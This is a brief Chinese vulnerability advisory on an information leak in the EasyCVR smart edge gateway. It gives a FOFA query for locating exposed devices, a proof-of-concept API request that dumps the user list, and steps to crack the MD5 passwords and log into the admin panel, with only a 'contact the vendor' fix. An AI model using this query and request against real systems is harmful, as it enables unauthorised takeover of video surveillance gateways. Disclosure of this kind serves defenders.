Nx01 产品简介
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。
Nx02 漏洞描述
EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
Nx03 产品主页
fofa-query: title="EasyCVR"
Nx04 漏洞复现
POC:
/api/v1/userlist?pageindex=0&pagesize=10
使用获取到的password进行MD5解密进行登录。
Nx05 修复建议
建议联系软件厂商进行处理。